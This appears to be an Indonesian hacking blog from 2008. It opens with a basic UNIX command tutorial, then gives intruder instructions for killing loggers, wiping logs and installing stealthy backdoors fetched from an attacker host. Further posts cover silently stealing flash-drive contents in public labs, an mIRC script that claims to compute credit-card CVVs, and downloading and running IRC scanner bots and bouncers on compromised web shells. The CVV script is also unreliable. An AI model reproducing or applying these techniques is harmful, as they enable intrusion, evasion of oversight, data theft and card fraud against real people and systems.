Dasar-dasar perintah UNIX

0 Comments »
PERINTAH-PERINTAH UNIX Sebelum lanjut perlu diingat bahwa di Linux/UNIX semua perintah ditulis dalam huruf kecil,dan Linux/UNIX membedakan huruf besar dan kecil.


——> ls
Ingat perintah DIR di DOS? … nah perintah ini sama dgn DIR, gunanya untuk menampilkan ‘list’ file di dalam directory. Perintah ls juga dilengkapi dengan flag tambahan yang bisa di lihat dengan mengetik : ls –help ; menampilkan bantuan man ls ; man bisa juga diartikan manual, jadi manual ls
Beberapa perintah ls yang umum adalah :
ls -l ; menampilkan informasi tambahan (l = long)
ls -a ; menampilkan hidden file (a = attribute)
ls -la Informasi tambahan yang ditampilkan oleh flag -l menyangkut user yang memiliki ‘owns’, file tanggal dan jam file itu dibuat, hak/permissions file, dan informasi lain, contoh :
rwxr-x–x
Catatan :
karakter 1-3: user/owner permissions
karakter 4-6: group permissions
karakter 7-8: other permissions
Arti Hurufnya itu ini lo:
r - read, permissions utk ‘baca’
w - write, permission utk ‘tulis’
x - (e)xecute, permission utk ‘menjalankan’
Jadi pada contoh diatas : user/owner dapat read/baca, write/tulis dan execute/jalankan file yg satu group dgn user/owner dpt read/baca, execute/jalankan file user lain dapat execute/menjalankan file tsb - berarti permission tidak ada, jika ada d sebelum permission berarti itu adalah directory

——> cat
Cat atau concatenate dipakai untuk menampilkan dan menulis/membuat file, kira-kira sama dengan perintah TYPE di DOS. Untuk menampilkan isi file ketik : “cat ” Untuk membuat file ketik : “cat > ” ketik isi file dan utk menyimpan tekan CTRL + C atau CTRL + D kalau namafile sudah ada file tersebut akan ditimpa, jika kita ingin data ditambahkan kefile yang sudah ada ganti > dengan >>

——> more
Menampilkan isi dari file, perlayar, tekan q untuk quit more jilid1.txt

——> grep
Menampilkan semua baris yang mengandung pola yang diinginkan grep kecoak jilid1.txt akan menampilkan semua baris teks yang mengandung kecoak di file jilid1.txt

——> man
UNIX help/manual, ketik : man untuk eksekusi. man pwd

——> echo
echo dipakai utk menampilkan apa yang kita ketik di layar, seperti :
echo “saya belajar linux”
saya belajar linux
atau untuk membuat file, seperti :
echo “biff n” > .profile
yang akan membuat file .profile di directory aktif yg berisi teks “biff n” atau menambah file isi file dgn mengganti > dengan >>

——> cp
copy, dipakai untuk mengcopy file.
cp jilid1.txt jilid1.txt.backup
cp jilid1.txt ~cyberbug/backup/jilid1.txt.backup

——> mv
move, mengganti nama file atau directory
mv jilid1.txt jilid1a.txt
mv backup bak

——> rm
remove, hapus file
rm jilid1.txt ; hapus file jilid1.txt
rm * ; hapus semua file di directory aktif (hati-hati!)

——> cd
change directory, dipakai untuk pindah directory, sama dengan perintah CD di DOS
cd /root
perhatikan bahwa di Linux yang digunakan adalah / (slash) bukan (backslash)

——> mkdir
make directory, membuat directory
mkdir backup

——> rmdir
remove directory, hapus directory, file-file dalam directory harus dihapus dulu sebelum menghapus directory.
rmdir backup

——> who
who digunakan untuk menampilkan user yang login ke system, hasilnya kira-kira sebagai berikut :
cyberservices:~$ who
root tty1 Dec 20 17:47
cyberbug tty2 Dec 20 17:48
cyberbug tty3 Dec 20 17:48
cyberbug ttyp0 Dec 20 18:43 (localhost)
Kolom pertama menunjukkan nama user yang login, kolom kedua menunjukkan terminal line yang digunakan, kolom ketiga menunjukkan waktu login dan kolom keempat menunjukkan domain atau IP asal mereka koneksi, jika kosong berarti mereka main langsung dari console.

——> whoami
Kalo lupa diri ini perintahnya : Siapakah Aku?
cyberservices:~$ whoami
cyberbug

——> who am i
Ini juga kalo sudah lupa daratan )
cyberservices:~$ who am i
cyberservices!cyberbug tty3 Dec 20 17:48

——> pwd
Tampilkan directory aktif, pwd = print working directory, perintah yang dipakai kalo saat jalan2, sudah gak tau mo pulang lewat mana
cyberservices:~$ pwd
/home/cyberbug

——> ps
Menampilkan proses yang aktif
cyberservices:~$ ps
PID TTY STAT TIME COMMAND
87 2 S 0:00 -bash
88 3 S 0:00 -bash
1440 2 S 0:00 pico jilid2.txt
1443 3 R 0:00 ps

——> ping
Mengecek host apakah ‘up’ utk istilah teknisnya silakan ‘man ping’
cyberservices:~$ ping localhost
PING localhost (127.0.0.1): 56 data bytes
64 bytes from 127.0.0.1: icmp_seq=0 ttl=64 time=0.2 ms
64 bytes from 127.0.0.1: icmp_seq=1 ttl=64 time=0.1 ms
64 bytes from 127.0.0.1: icmp_seq=2 ttl=64 time=0.1 ms
64 bytes from 127.0.0.1: icmp_seq=3 ttl=64 time=0.1 ms
64 bytes from 127.0.0.1: icmp_seq=4 ttl=64 time=0.1 ms

— localhost ping statistics —
5 packets transmitted, 5 packets received, 0% packet loss round-trip min/avg/max = 0.1/0.1/0.2 ms
cyberservices:~$ ping 127.0.0.1
PING 127.0.0.1 (127.0.0.1): 56 data bytes
64 bytes from 127.0.0.1: icmp_seq=0 ttl=64 time=0.2 ms
64 bytes from 127.0.0.1: icmp_seq=1 ttl=64 time=0.1 ms
64 bytes from 127.0.0.1: icmp_seq=2 ttl=64 time=0.1 ms
64 bytes from 127.0.0.1: icmp_seq=3 ttl=64 time=0.1 ms
64 bytes from 127.0.0.1: icmp_seq=4 ttl=64 time=0.1 ms

— 127.0.0.1 ping statistics —
5 packets transmitted, 5 packets received, 0% packet loss
round-trip min/avg/max = 0.1/0.1/0.2 ms
cyberservices:~$
Perhatikan bahwa localhost dan 127.0.0.1 adalah sama
127.0.0.1 adalah local loopback yang disediakan untuk testing.

——> finger
Mencari informasi user
cyberservices:~$ finger
Login Name Tty Idle Login Time Office Office Phone
cyberbug CyberBug 2 Dec 22 01:10
cyberbug CyberBug 3 Dec 22 01:10
root 1 1:37 Dec 22 01:10
cyberservices:~$ finger @cyberservices.com
[cyberservices.com]
Welcome to Linux version 2.0.34 at cyberservices.com !
3:46am up 2:37, 3 users, load average: 0.00, 0.00, 0.00
Login Name Tty Idle Login Time Office Office Phone
cyberbug CyberBug 2 Dec 22 01:10
cyberbug CyberBug 3 Dec 22 01:10
root 1 1:39 Dec 22 01:10
cyberservices:~$ finger @localhost

[localhost]
Welcome to Linux version 2.0.34 at cyberservices.com !
3:47am up 2:38, 3 users, load average: 0.00, 0.00, 0.00
Login Name Tty Idle Login Time Office Office Phone
cyberbug CyberBug 2 Dec 22 01:10
cyberbug CyberBug 3 Dec 22 01:10
root 1 1:40 Dec 22 01:10
cyberservices:~$ finger cyberbug
Login: cyberbug Name: CyberBug
Directory: /home/cyberbug Shell: /bin/bash
On since Tue Dec 22 01:10 (PHT) on tty2 8 seconds idle
On since Tue Dec 22 01:10 (PHT) on tty3
Last login Tue Dec 22 01:13 (PHT) on tty4
Mail forwarded to “|IFS=’ ‘&&exec /usr/bin/procmail -f-||exit 75

#cyberbug”
No mail.
No Plan.
cyberservices:~$ finger root
Login: root Name:
Directory: /root Shell: /bin/bash
On since Tue Dec 22 01:10 (PHT) on tty1 1 hour 42 minutes idle
Mail last read Tue Dec 15 09:19 1998 (PHT)
No Plan.

——> telnet
Melakukan komunikasi dengan host lain melalui telnet protocol
cyberservices:~$ telnet localhost
Trying 127.0.0.1…
Connected to localhost.
Escape character is ‘^]’.
Welcome to Linux 2.0.34.
cyberservices login: cyberbug
Password: 3m4nggu3p1k1r1n
Linux 2.0.34.
Last login: Tue Dec 22 01:13:52 on tty4.
No mail.
cyberservices:~$ telnet localhost 25
Trying 127.0.0.1…
Connected to localhost.
Escape character is ‘^]’.
220 cyberservices.com ESMTP Sendmail 8.9.0/8.9.0; Tue, 22 Dec 1998
03:52:51 +0800
helo darling
250 cyberservices.com Hello cyberbug@localhost [127.0.0.1], pleased to
meet you
mail from: guest@cyberservices.com
250 guest@cyberservices.com… Sender ok
rcpt to: untukmu@seorang.jauh.disana
250 untukmu@seorang.jauh.disana… Recipient ok (will queue)
data
354 Enter mail, end with “.” on a line by itself
Kukirim lagu dan salam rinduku .
250 EAA01615 Message accepted for delivery quit
cyberservices:~$ telnet localhost 110
Trying 127.0.0.1…
Connected to localhost.
Escape character is ‘^]’. +OK cyberservices POP3 Server (Version 1.005l) ready at
user root
+OK please send PASS command pass 3m4nggu3p1k1r1n
+OK 2 messages ready for root in /usr/spool/mail/root stat
+OK 2 7227
retr 1
quit

——> ftp
Menggunakan file tranfer program
cyberservices:~$ ftp localhost
Connected to localhost.
220 cyberservices.com FTP server (Version wu-2.4.2-academ[BETA-15](1) Wed May 20 13:45:04 CDT 1998) ready.
Name (localhost:cyberbug): ftp
331 Guest login ok, send your complete e-mail address as password.
Password: cyberbug@k-elektronik.org
230-Welcome, archive user! … blah blah … blah
230 Guest login ok, access restrictions apply.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp>
ftp juga bisa dilakukan dengan melakukan telnet ke port 21
cyberservices:~$ telnet localhost 21
Trying 127.0.0.1…
Connected to localhost.
Escape character is ‘^]’.
220 cyberservices.com FTP server (Version wu-2.4.2-academ[BETA-15](1) Wed May 20 13:45:04 CDT 1998) ready.

——> talk
Berbicara dengan user lain, misalnya cyberbug request talk ke root sbb:
talk root
atau
talk root@cyberservices.com
[Waiting for your party to respond]
[Ringing your party again]
Di terminal root akan muncul pesan :
Message from Talk_Daemon@cyberservices at 4:00 …
talk: connection requested by cyberbug@localhost.
talk: respond with: talk cyberbug@localhost
root harus mengetik talk cyberbug@localhost jika ingin menjawab request
talk cyberbug@localhost
[Connection established]

:: Perintah Tambahan dari Saya ( r3v0lt aka Intruded)
1. Perintah Untuk Kompilasi File
ex. #gcc -o namafile filekompilasi
#gcc -o pscan pscan.c
2. Perintah Running file eksekusi
ex. #./file
#./pscan
#./scaner.pl
#./scanner.sh
3. Perintah Hentikan proses
ex.# Ctrl+c
4. Perintah Proses sementara
ex.#ctrl+z ,balik ke shell ketik fg (pada FreeBSD)
5. Perintah ganti Shell (pada FreeBSD)
ex.#chsh —> ksh,bash,tcsh
6. Perintah Ganti Passwd
ex.#passwd
7. Perintah melihat ip suatu host
ex.#dig ip
ex.#nslookup ip
8. Perintah editor
ex.#pico wepedodol.c
9. perintah pipa, dua proses sekaligus
ex.# ls -al |head file
akan menanmpilakn direktori bagian atas nya saja
10.perintah ganti mode
ex.#chmod +x file
r - read, permissions utk ‘baca’
w - write, permission utk ‘tulis’
x - (e)xecute, permission utk ‘menjalankan’

::: Keterangan Lae Kita Mixter =
1. killall -9 syslogd klogd - pesky loggers! only few admins will notice if they get turned off. Now you can act freely. copy secure.1 and messages.1 from /var/log over secure and messages Normally, these logs are the only ones with the intruders IP and traces of a root compromise in them. If *.1 doesn’t exist, truncate the files. Also, unset HISTFILE is important. Nobody does unset HISTFILE, thus leaving a .bash_history in /var/named or even /. Very unprofessional .
2. uname -a, w, last -10, cat /etc/passwd /etc/inetd.conf… Inform yourself about the frequency the system is being maintained, administrated, if the logfiles are being analyzed.
* Look how many people have access to it (/etc/passwd) - the more the better for you (keeps attention away from you).
* Look if the system is already backdoored!! you might want to remove other backdoors.
* Look for a loghost or snmp (dangerous because you cant manipulate the logs on a far-away loghost). Watch out for *logd, sniffers, netmon’s etc before you do anything great on the host. If you are paranoid, traceroute the host, and see if non-routers are before that host (probably IDS, loghost, sniffer, etc).
3. This is important: DONT MANIPULATE THE SYSTEM CONFIGURATION! DOH! It is too easy to detect you if you add yourself to /etc/passwd, or open a port by manipulating inetd.conf. Let me tell you that root kits and /bin/login trojans are the first things any sane admin will watch for. Install a nice stealthy port backdoor. My approach to uploading files is doing:
(on your box)
$ uuencode -m backdoor.c backdoor.c | less
(on the target box)
uudecode
# cc -o backdoor backdoor.c
A nice different method is putting a daemon on your own box, on port 666, that spits out the source code when someone telnets to it, so you can do telnet ppp-42.haxor.net 666 > backdoor.c As I said, make sure you can get back in. If the box you rooted has an uptime of more than 300 days or so, you might consider not installing the backdoor for startup. Instead, kill the vulnerable daemon, and when the host restarts, come back using an exploit. Normally, you can replace a lame daemon that nobody uses with your backdoor. Look at inetd.conf to see what daemons are active. A safe bet is in.talkd which often is activated but seldom ever used. So, when you want to re-activate your backdoor, talk root@0wned.host.com for a second, and your backdoor is running. You can also add /path/to/backdoor to /root/.profile.. but it is a bit riskier than the inetd backdoor method.
4. Subscribe to bugtraq, CIAC security list, or look at rootshell, to see what you need to do to patch your buggy stuff. If RPM is installed you can try a rpm -U ftp://ftp.cdrom.com/rightdir/daemon.rpm If not, use ncftp to fetch the file anonymously, because it doesn’t need user interaction. If you want, add an additional backdoor in your “patched” server. QPOP 2.53 even supports this itself. For all files you replace, you should modify the time stamps, which wont help, if the admin uses tripwire or cksum, but if the admin is, like most admins, a complete lamer that does find / -ctime to scan for trojans and thinks he knows his job. To modify timestamps, you do a simple:
touch -r /bin/bash /path/to/your/trojan
this will copy the exact date/time info from /bin/bash over your freshly added trojan. Voila! The alternative to all this for lazy people is, to add a ipfwadm rule that prevents traffic from the outside (-W eth0) to the ports with the buggy daemons, and adding that command to a rc.d script as well. Bind doesn’t need tcp port 53 for anything except zone transfers and the RoTShB/ADM bind exploits. It works fine with 53/tcp firewalled. But be aware that this might get you detected, lets say if you disable port 110 or 143 on an ISP’s central mail exchange server…
About your backdoor:
Port > 10000 is strongly recommended, also a backdoor using UDP, ICMP, or even something as unusual as raw IP is very useful. People that bind /bin/sh to a port are idiots, because they open that host to everyone, letting in sniffers, and probably other people who may damage the host seriously. Make sure to password protect everything that runs as root. A password of a minimum length of 8 characters, because you have no way of detecting a brute force attack. For the C programmers, let me say, listen(sockfd,1). Maybe 2 connections, but not more.
For comfortability, you can add some stuff you want to occur on each successful backdoor login, like system(”w”), system(”killall -9 syslogd klogd”), or whatever. If you want a front-end backdoor with some integrated functions, try gateway[5].

Sumber korido-crew.tk ::: Tutorial CyberBug
3/25/2008 11:33:00 AM

Mencuri Data-Data Milik Pengguna FLASHDISK

0 Comments »
FlashDISK merupakan media penyimpanan portable yang kini makin banyak digunakan oleh para pengguna komputer di Indonesia. Selain harganya yang makin murah, kapasitasnya pun kian besar dengan ukuran fisik yang kian mini dari generasi ke generasi ;)

Nah, biasanya nich, orang seringkali akan menyimpan data-data sensitifnya di dalam flashdisk. Dan tak jarang, seseorang menyimpan PASSWORD account-accountnya pada suatu file teks yang disimpan dalam FlashDISK.

Anda mengincar target yang demikian? caranya cukup mudah. Alat dan bahan yang perlu anda persiapkan adalah: ThumbsuCK.exe download secara cuma-cuma di http://jerrystage.wordpress.com/downlo4d/

Setelah anda mendownloadnya, copy ThumbSUCK.exe kedalam suatu directory tersembunyi. Misalnya saja anda letakkan di Local Drive D:\. Buatlah suatu directory dengan atribut SUPER HIDDEN agar korban tidak curiga. Ikuti panduan berikut:

1. Buatlah directory baru di D:\ atau dimanapun anda suka. Beri nama terserah anda.

Pada contoh ini saya beri nama gudangkorban. Salinlah ThumbSUCK.exe kedalam

directory tersebut lalu klik 2X untuk menjalankannnya.

2. Klik Start - Run lalu ketik cmd untuk memanggil Windows Command Processor

3. Kini saatnya menjadikan directory tersebut menjadi super hidden. Gunakan saja

perintah attrib dengan format attrib lokasifolder +s +h. Karena nama directory

yang tadi dibuat adalah gudangkorban yang terletak di drive D:\ maka ketik:

attrib d:\gudangkorban +s +h

lalu tekan ENTER.

Selesai sudah.. kini cobalah anda tancapkan sendiri FlashDISK anda. Data-data anda yang berada didalam FlashDISK akan disalin dengan silent mode oleh ThumbSUCK.exe kedalam directory gudangkorban di suatu folder dengan nama sesuai dengan volume label Flashdisk.

Karena directory gudangkorban diberi atribut super hidden, maka hilangkan terlebihdahulu tanda centang pada opsi Hide Protected Operating System Files (Recomended) dan beri centang pada Show Hidden Files and Folders di Folder Options (Tools -> Folder Options pada Windows Explorer).

Untuk mendisable aplikasi ini, gunakan Windows TaskManager (CTRL-ALT-DELETE) atau gunakan saja TaskMANAGER kesayangan anda.

Bagaimana jika ditanam di komputer public? atau ditanam di lab-lab kampus? Hmm.. dengan sedikit beramain-main Registry, anda dapat membuat aplikasi ini otomatis berjalan ketika windows startup ;p hehehe.. tentunya anda bisa panen data pribadi orang lain ^_^
3/25/2008 11:27:00 AM

Download MP3 via mIRC

0 Comments »
Saya ingin berbagi ilmu sedikit tentang mendapatkan lagu lewat mIRC dengan cara DCC/transfer data. Dimana lagu? yang bisa didapatkan adalah lagu? baru yang kebanyakan lagu Indonesia walau tak sedikit lagu Luar Negri juga tersedia.

Ok.. kita mulai saja…

Buka mIRC. Masuk ke server EFnet. caranya, ketik /s irc.EF.net setelah connect, masuk ke channel #indomp3z ( sekarang musti isi mp3 dibelakangnya, jadi ketik #indomp3z)

Nah, silahkan mencari lagu yang anda ingin disana. Namun, ga semua lagu ada. Nothing perfect….
contoh…..:
mau nyari lagu Andra & The Backbone judulnya Main Hati. ketik @find Andra & The Backbone - Main Hati di channel. Tunggu sampai ada server yang pv kita. setelah itu, buka pv dari dia, blok dari nicknya sampai ekstensi file mp3nya (kalo bisa lewat dikit, dan juga kalo di mIRC blok itu sama dengan copy). kemudian paste ke channel… nah silahkan menunggu DCC dari server. Bentuknya seperti pop up yang ada di website. kemudian silahkan anda save dimana anda ingin save file tersebut….

Selain server nullus ada satu lagi server yang saya ketahui untuk donlot lagu. masuk ke server irc.theoneserv.net (/s irc.theoneserv.net) kemudian masuk ke channel #theone

Tapi harus diperhatikan disini, bahwa channel itu hanya menerima nick yang sudah di register. jadi anda harus register terlebih dahulu.

sekalian saja saya beritahu (mungkin juga sudah ada yang tau) ketik /ns register (tanpa tanda <>) di textbox server. email harus yang aktif dan benar2 milik anda. setelah sukses, aktifasi nick anda.

buka email anda. cari di inbox email yang datang dari theoneserv.net. baca dan klik url yang berisi nick anda. biasanya url itu link yang menuju mirc web. jika url yang anda klik benar, maka akan tampil window baru yang berisi halaman dari mirc yang mengatakan regristrasi anda telah sukses.

nah… kembali ke mirc, saat anda masuk ke server theoneserv.net, anda akan dipaksa untuk mengidentifikasi nick anda selama 30 detik untuk memastikan bahwa andalah yang memiliki nick tersebut. caranya, ketik /ns identify (ingat jangan sampai lewat 30 detik..!! dan tanpa tanda <>) jika berhasil, di window server akan muncul kata kata :
-NickServ- Password accepted - you are now recognized.

3/20/2008 08:19:00 PM

Download Video Clip Via mIRC

0 Comments »
Seneng ngumpulin video clip? Memang ada Youtube yang bisa dijadikan sarang hunting buat mencari video clip. namun kulitas video yang didapat mungkin tidak bagus.

mIRC bisa dijadikan sebuah alternatif untuk mendonlot video clip yang kita cari, dengan catatan video clip disini adalah video clip luar negeri.

OK… biar ga panjang lebar kita langsung aja. ini adalah langkah2nya… saya anggap anda sudah pernah memakai mIRC sebagai client chat anda.

  1. Buka mIRC dan masuk ke server EFNet
  2. Setelah koneksi berhasil, masuklah ke channel #videopimp
  3. Nah.. ketikkanlah @find untuk mencari video clip. contohnya @find creed
  4. Jika ada bot yang mempunyai video clip tersebut, bot tsb akan pv anda dan akan memberikan perintah untuk melakukan copy paste di jendela channel. contohnya adalah “Found 200201\Creed - 01 - Bullets (LIVE VH1 Opening Night) - videopimp.com.mpg To access this, type /ctcp p00py VP” nah… copy paste bagian “/ctcp p00py VP” di jendela channel.
  5. Setelah di copy paste, akan ada box pop up DCC yang akan tampil, klik accept
  6. Setelah tersambung secara DCC, maka dibutuhkan sedikit pengetahuan command UNIX/Linux
  7. Commandnya adalah cd, dir, get, ls…
  8. Pertama kali kita lihat direktori yang ada, maka ketik “dir”
  9. Setelah terlihat semua direktori yang ada.. kita masuk ke direktori tujuan. Tapi kita lihat lagi bagian yang kita cari. Di sini contoh saya adalah “Found 200201\Creed - 01 - Bullets (LIVE VH1 Opening Night) - videopimp.com.mpg To access this, type /ctcp p00py VP” seperti yang di atas. maka masuklah ke direktori 200201 dengan mengetikkan command “cd 200201″
  10. Setelah itu ketikkan command untuk melihat isi direktori. commandnya adalah “dir”
  11. Maka akan terlihat list video clip yang terdapat dalam direktori. Lagu yang saya cari adalah “creed - 01 - bullets (live vh1 opening night) - videopimp.com.mpg 46.2 mb” lengkap dengan kapasitasnya.
  12. Untuk mendapatkannya/mendonlotnya kita gunakan command get. contohnya adalah “get creed - 01 - bullets (live vh1 opening night) - videopimp.com.mpg”. ingat.. jangan sampai 46.2 mb ikut terketik.
  13. Jika berhasil akan ada box pop up pengiriman DCC..Namun jika gagal, berarti anda harus mensetting mIRC anda untuk dapat bisa menerima file dengan ekstensi .mpg
  14. Klik tools >> option di mIRC anda ato klik Alt+O
  15. Maka akan keluar jendela option. Pilih bagian DCC dan subfolder Ignore
  16. Disebelah kanan akan ada box drop down, pilih accept only
  17. Kemudian pada file type, masukkan”*.mpg” kemudian klik add. Maka file2 yang berekstensi .mpg akan otomatis di donlot oleh mIRC jika anda memintanya…

Ket :

  1. Command dan keterangan di atas tidak menggunakan tanda petik 2 (”)
  2. Perlu diingat pula, channel #videopimp melarang pencarian video clip METALLICA
3/20/2008 08:16:00 PM

Script Cek CVV Credit Card Lewat mIRC

0 Comments »
Ini adalah script buat ngecek cvv dari kartu kredit.

perlu dicatat 90% hasilnya adalah benar… bukan pasti benar.

caranya, buka irc (ga perlu konek ke server). klik Alt+R
nah akan keluar box. pada tab remote tsb, masukkan script di bawah ini :

alias f5 cvv2
menu status,channel,query {
-
Cari CVV:cvv2
}
alias cekcvv2 {
set %cv1 $left(%cc,8)
set %cv1.1 $right(%cv1,1)
set %cv2 $left(%cc,12)
set %cv2.2 $right(%cv2,1)
set %cv3 $left(%cc,3)
set %cv3.3 $right(%cv3,1)
set %cv4 $left(%cc,1)
set %cv4.4 $calc(%cv3.3 + 1)
set %cvv2 %cv1.1 $+ %cv2.2 $+ %cv4.4
set %cvv $left(%cvv2,3)
.timer 2 2 /echo CVV dari %cc adalah %cvv Sikat!!!
.timer 1 5 /echo —– CVV2 Edited by LeNK #balihackerlink on DALNet —–


}
alias cvv2 dialog -m cvv2 cvv2
dialog cvv2 {
title “CVV Finder by LeNK”
size -1 -1 250 145
box “Enjoy..!!”,2, 4 4 242 110
text “Masukan No CC Yang akan di cari CVV-nya”,4, 1 30 249 25, center
edit “”,5, 55 57 140 20 ,autohs
button “&Cari..!!!”,3, 80 85 100 20,defult,ok
text “Email : l3nk@walla.com “,7, 1 120 249 25, center,disable
}
on 1:dialog:cvv2:*:*: {
if ($devent == sclick) {
if ($did == 3) {
.set %cc $did(5)
.timer 1 1 cekcvv2
}
}
}

jika sudah, klik OK.
nah cara makenya, klik kanan di layar irc dan akan ada pilihan cari cvv pada bagian bawah. masukkan no kartu kreditnya, dan dapatilah hasilnya
3/20/2008 08:15:00 PM

Cara Mencari Dan Menggunakan Proxy Buat Nyamarin IP Address

0 Comments »
Bagi mereka yang udah sering bersentuhan dengan dunia maya atau Internet, mungkin udah ga asing lagi denger kata Proxy. Yup.. proxy itu seperti mirror/pemantul yang berguna untuk menutupi IP address asli kita.

Biasanya proxy ini digunakan untuk menutupi privacy kita. Yah.. namanya dunia maya, kita ga tau orang2 seperti apa saja yang berkecimpung di dalamnya. Jadi kita bisa berhati-hati.

Ok.. saya beri sedikit langkah yang simple untuk mencari dan menggunakan proxy.

  1. Buka http://www.aliveproxy.com/
  2. Trus carilah proxy negara mana yang ingin dipakai. Kebanyakan memakai negara USA, itu dikarenakan banyaknya proxy yang ada dan juga terkenal kenceng. Tapi ga selalu lo.
  3. Liat ip dan port mana yang mau dipakai, semisal ini “69.14.211.102:2396″ dimana “69.14.211.102″ adalah IPnya dan “2396″ adalah portnya.
  4. Yang perlu diingat adalah cari IP yang mempunyai keterangan “anonymous”

Nah.. untuk cara pakainya :

- Internet Explorer :

  1. Buka tools > internet options
  2. Klik tab Connection trus klik LAN Settings
  3. Pada bagian proxy server, isi centang pada “use a proxy..”
  4. Pada box address masukan IP proxy, pada box port masukan portnya
  5. Centang juga bagian “by pass..”
  6. klik OK

- Mozilla Firefox versi 2:

  1. Buka tools > options
  2. Bagian advance, klik tab Network
  3. Bagian Connection, klik Setting di sebelah kanan
  4. Kemudian pilih manual proxy configurations
  5. Pada bagian HTTP proxy, masukkan IP proxy dan portnya
  6. klik OK

- Opera 9 :

  1. Buka tools > preferences
  2. Pilih tab advance
  3. Pilih Network di bagian kiri, kemudian klik proxy server dibagian kanan
  4. Centangi bagian HTTP kemudian masukkan IP proxy dan portnya
  5. Klik OK

Nah.. anda telah menggunakan proxy. Namuh tetap harus di cek dulu apakah proxy itu jalan atau tidak. Cara ngeceknya adalah arahkan browser anda yang telah menggunakan proxy ke salah satu web dibawah ini :

  1. http://www.cmyip.com/
  2. http://www.checkip.org/
Jika berhasil, tampilan browser adalah IP proxy lengkap dengan negaranya. Itu berarti proxy yang anda gunakan telah berjalan dan anda telah siap untuk browsing
3/20/2008 08:02:00 PM

Cara Membuat Bot Scan RFI di mIRC

0 Comments »
Saya mau menjelaskan sedikit cara mencari target/shell melalui bot scanner RFI di irc. Anda bisa dapatkan scriptnya di page script collection blog saya ini. saya anggap anda sudah mengerti sedikit mengenai command linux dan injection web. disini saya menggunakan shell c99 dan r57 sebagai panduannya.

ok.. kita mulai.

  1. Copy paste dan simpan script yang saya beri di geocities ato web anda kedalam format txt, ato anda juga bisa langsung menggunakan milik saya
  2. Masuk ke shell anda
  3. cari direktori yang memberikan permission 777 dengan command “find / -perm 777 -type d”
  4. jika ga ada, langsung aja menuju direktori /tmp ato /var/tmp
  5. wget script bot dari web geocities saya ato dari tempat anda. saya pake contoh punya rekan saya, jadi commandnya “wget pluto5yc04.alkadr.com/IOS/Users/pluto5yc04.alkadr.com/Files/ngedan.txt”
  6. jika ga berhasil, coba pake command lwp-download tapi dengan url yang lengkap, commandnya “lwp-download http://pluto5yc04.alkadr.com/IOS/Users/pluto5yc04.alkadr.com/Files/ngedan.txt”
  7. kalo ga bisa juga, pakailah fitur uploadnya karena saya menggunakan r57 ato c99. dan uploadlah script botnya dengan fitur tersebut. jika belum punya filenya, donlot aja dari http://pluto5yc04.alkadr.com/IOS/Users/pluto5yc04.alkadr.com/Files/ngedan.txt
  8. Saya anggap script tersebut udah di upload, maka jalankan commandnya “perl namafile server nick ident channel owner fakeproccess” contohnya ” perl scan.txt irc.dal.net bugzz bug balihackerlink LeNK /usr/sbin/apache”
  9. Jika berhasil, di shell anda akan keluar tulisan.. dan di channel yang anda join, bot akan pm anda dan beri salam “you are my master”
  10. Untuk mengetahui command yang dipake, pm bot dan ketik !cmdx @help
  11. Silahkan dipergunakan sebaik mungkin

Ket :

  1. Ini adalah tutor untuk pembuatan bot scan RFI pada web hasil inject
  2. Tutor ini hanya berjalan pada mesin Linux ato keluarga UNIX
  3. Semua command di atas tanpa tanda petik dua (”)

Semoga membantu…
Credit to : dr.pluto

Editing sedikit :

banyak rekan yang menanyakan kenapa bot tidak jalan? banyak faktor yang menyebabkan hal tersebut

  • Shell lambat
  • Script yang tidak mau jalan di shell

sebenarnya, jika bot sudah masuk ke channel dan bot telah pm/pv anda dengan kata “You are my master” itu tandanya bot telah jalan. Jadi coba dengan command !cmdx @help saat pv/pm bot untuk melihat list helpnya. Script ini masih berfungsi setelah saya coba..

Dan untuk selanjutnya, mungkin akan saya buat artikel mengenai bot scan yang lainnya. jadi harap ditunggu.. :D

3/20/2008 08:00:00 PM

CARA MEMBUAT PSY PADA mIRC

0 Comments »

psyBNC adalah sebuah bouncer untuk dipergunakan dalam IRC. maksud dari bouncer disini adalah seperti mirror dimana kita melakukan koneksi ke server IRC melalui bouncer tersebut. Mungkin para pengguna IRC udah pada tau apa itu IRC. Nah saya akan sedikit menjabarkan langkah² pembuatan psyBNCnya.

Langkah²nya adalah sebagai berikut :

  1. masuk ke shell anda
  2. cari direktori yang memberikan permission 777 dengan command “find / -perm 777 -type d”
  3. jika ga ada, langsung aja menuju direktori /tmp ato /var/tmp
  4. wget file psyBNCnya di web geocities saya. commandnya “wget geocities.com/rah_polenk/files/psy.tar.gz”
  5. jika ga berhasil, coba pake command lwp-download tapi dengan url yang lengkap, commandnya “lwp-download http://www.geocities.com/rah_polenk/files/psy.tar.gz”
  6. kalo ga bisa juga, pakailah script injectkan r57 ato c99 sehingga ada fitur uploadnya. dan uploadlah file psynya dengan fitur tersebut. jika belum punya filenya, donlot aja dari geocities.com/rah_polenk/files/psy.tar.gz
  7. saya anggap udah terupload ke server ya.. maka harus diextract dulu file tersebut dengan command “tar -zvxf psy.tar.gz”
  8. setelah diextract, masuk ke direktori .marlon dengan command “cd .marlon”
  9. nah setelah itu masukkan perintah untuk membuat file confignya. commandnya adalah “./config ident port” contohnya “./config LeNK 9999″ portnya bisa bebas asal 4 digit
  10. setelah itu ketik command “./fuck”
  11. setelah itu ketik command “./run”
  12. jika berhasil akan keluar tampilan berisi kata psybnc
  13. setelah itu coba masuk ke mIRC
  14. seting ident yang tadi dipake saat pembuatan file config
  15. kemudian masuk ke server yang tidak lain adalah nama web inject tersebut (example.com) dan juga portnya. commandnya adalah “/server example.com port” contohnya “/server example.com 9999″
  16. jika masuk, akan ada permintaan untuk memasukkan password maka ketik “/pass pasword” contohnya “/pass lenkganteng”
  17. nah.. abis tu masukkan server irc ke dalam psyBNCnya dengan command “/addserver ircserver:port” contohnya “/addserver irc.dal.net:7000″
  18. maka dia akan konek ke server dalnet dengan port 7000
  19. untuk melihat list command psy, silahkan ketik “/bhelp”

Ket :

  1. Ini adalah tutor untuk pembuatan psyBNC pada web hasil inject
  2. Tutor ini hanya berjalan pada mesin Linux ato keluarga UNIX
  3. Semua command di atas tanpa tanda petik dua (”)

sekian tutor singkat pembuatan psyBNC dari saya.. semoga tutor ini bisa membantu anda semua

3/19/2008 11:45:00 AM